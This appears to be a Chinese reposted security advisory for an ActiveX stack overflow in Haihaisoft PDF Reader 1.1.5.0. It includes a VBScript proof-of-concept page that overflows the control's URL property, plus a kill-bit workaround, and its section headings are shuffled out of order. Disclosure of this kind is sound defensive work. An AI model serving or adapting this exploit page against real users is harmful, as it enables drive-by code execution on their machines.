受影响系统:
Haihaisoft PDF Reader 1.1.5.0
描述: shinnai@autistici.org)
链接:http://secunia.com/advisories/40520/
http://www.shinnai.altervista.org/exploits/SH-001-20100714.html
*>
测试方法:
海海软件PDF阅读器是全球最轻量级的免费阅读器。
海海软件PDF阅读器所安装的PDFReaderOCX ActiveX控件没有正确地验证URL属性参数,用户受骗访问了恶意网页并在文件名中提供了超过2048字节的超长字符串就可以触发栈溢出,导致执行任意代码。
<*来源:shinnai (
<object classid=’clsid:28CB49D6-E530-442B-A182-79F047C3AA1B’ id=’test’></object>
<script language="vbscript">
buff = "AAAAAAAAAAAAAAABBBB" + String(2011, "C")
test.URL = buff
Function tryMe()
document.location.reload
End Function
Sub Window_OnLoad
setTimeout "tryMe()",2000
End Sub
</script>
建议:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
临时解决方法:
* 为clsid: 28CB49D6-E530-442B-A182-79F047C3AA1B设置kill bit。
厂商补丁:
Haihaisoft
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。